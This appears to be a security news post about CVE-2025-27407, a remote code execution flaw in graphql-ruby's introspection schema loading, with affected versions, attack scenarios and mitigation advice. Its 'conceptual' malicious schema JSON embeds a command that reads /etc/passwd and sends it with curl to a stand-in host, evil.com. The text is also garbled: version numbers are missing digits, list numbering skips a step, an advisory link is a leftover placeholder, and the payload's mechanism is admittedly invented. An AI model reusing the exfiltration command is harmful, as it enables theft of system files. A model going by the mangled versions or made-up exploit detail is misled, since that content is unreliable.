CVE CyberSecurity Database News

CVE-2025-27407 - Remote Code Execution in graphql-ruby via `from_introspection` Schema Loading

Poster -

A critical vulnerability was discovered in graphql-ruby, the popular Ruby library for implementing GraphQL APIs. If your application uses certain versions of graphql-ruby, attackers could exploit a flaw in schema loading via introspection, resulting in remote code execution (RCE). The problem affects anyone who loads GraphQL schemas from external or untrusted sources—including use cases with GraphQL::Client.

In this post, we explain how CVE-2025-27407 works, who’s at risk, and how to protect your systems. We demonstrate exploit details and provide actionable mitigation steps.

Who is Vulnerable?

Affected versions:

2.3. up to (but not including) 2.3.21

Patch versions:

2.3.21

If you use GraphQL::Schema.from_introspection or GraphQL::Schema::Loader.load with JSON schema definitions from untrusted sources, you are at risk.

How Does the Vulnerability Work?

GraphQL offers an introspection system, letting clients fetch the entire schema as a JSON file. graphql-ruby can load this schema back using:

schema = GraphQL::Schema.from_introspection(json_response)

or

schema = GraphQL::Schema::Loader.load(json_response)

Older versions of graphql-ruby do not properly sanitize the loaded schema. With carefully crafted JSON, attackers can trick the loader into running arbitrary code. If you load schema JSON from a third party, forged response, or user input, attackers can exploit this to execute system commands or manipulate your app.

Consider the following code in a Rails console or app

# Loads a JSON schema from an untrusted source
raw_json = File.read('dangerous_schema.json')
schema = GraphQL::Schema.from_introspection(JSON.parse(raw_json))

A malicious dangerous_schema.json can inject Ruby objects or override methods during load, giving the attacker control.

Example: Malicious dangerous_schema.json (simplified)

The real exploit schema is long, but it might abuse features like field resolve definitions, passing unexpected Ruby constructs. Here’s a conceptual example:

{
  "data": {
    "__schema": {
      "queryType": { "name": "Query" },
      "types": [
        {
          "kind": "OBJECT",
          "name": "Query",
          "fields": [
            {
              "name": "exploit",
              "type": { "kind": "SCALAR", "name": "String" },
              "resolve": "system('curl http://evil.com?pw='; + cat /etc/passwd)"
            }
          ]
        }
      ]
    }
  }
}

When loaded, the attacker’s resolve key could trick unsafe code handling logic to execute arbitrary Ruby code. In real attacks, the exploit would be more subtle and packaged to slip by checks.

Real-world Attack Scenarios

- CI/CD pipelines: Automatically loading remote GraphQL schemas during builds.
- GraphQL Client apps: Using GraphQL::Client or similar to fetch schemas from an API endpoint that an attacker can control or intercept (man-in-the-middle or direct control).

Schema stitching tools: Aggregators that pull many schemas may be vulnerable.

Once successfully exploited, the attacker gains access to your server with the same permissions as the Ruby process—potentially leading to data theft, further infection, or total system compromise.

2. Never Load Schemas from Untrusted Sources

Avoid calling GraphQL::Schema.from_introspection or .load on JSON you did not produce or cannot verify. If you must use remote schemas, validate their source over secure channels (e.g., HTTPS with certificate pinning).

3. Sanitize Inputs

If loading schemas dynamically, ensure they are only from trusted, immutable sources. Consider static schema files bundled with your codebase.

Official Reference

- GitHub Security Advisory: CVE-2025-27407 *(Replace with actual GHSA link)*
- graphql-ruby release notes

Detecting Exploitation

Look for unusual network requests, high CPU usage, or error logs in your app if you have ever loaded schemas from external sources.

Scan your codebase for these calls

GraphQL::Schema.from_introspection
GraphQL::Schema::Loader.load

Summary Table

| Version Range | Vulnerable? | Fixed in |
|-------------------|-------------|-----------------|
| 1.11.5-1.11.7 | Yes | 1.11.8 |
| 1.12.-1.12.24 | Yes | 1.12.25 |
| 1.13.-1.13.23 | Yes | 1.13.24 |
| 2..-2..31 | Yes | 2..32 |
| 2.1.-2.1.13 | Yes | 2.1.14 |
| 2.2.-2.2.16 | Yes | 2.2.17 |
| 2.3.-2.3.20 | Yes | 2.3.21 |

Final Thoughts

CVE-2025-27407 shows how critical it is to treat all external data as unsafe. If your app loads GraphQL introspection schemas, update now and review your supply chain.

Stay safe—patch early!

*For questions or more exploit details, see: graphql-ruby discussions*


> Disclaimer: This post was written exclusively for educational and awareness purposes. Do not attempt to exploit or abuse this vulnerability in systems without explicit permission.

Timeline

Published on: 03/12/2025 19:15:40 UTC
Last modified on: 03/12/2025 21:15:42 UTC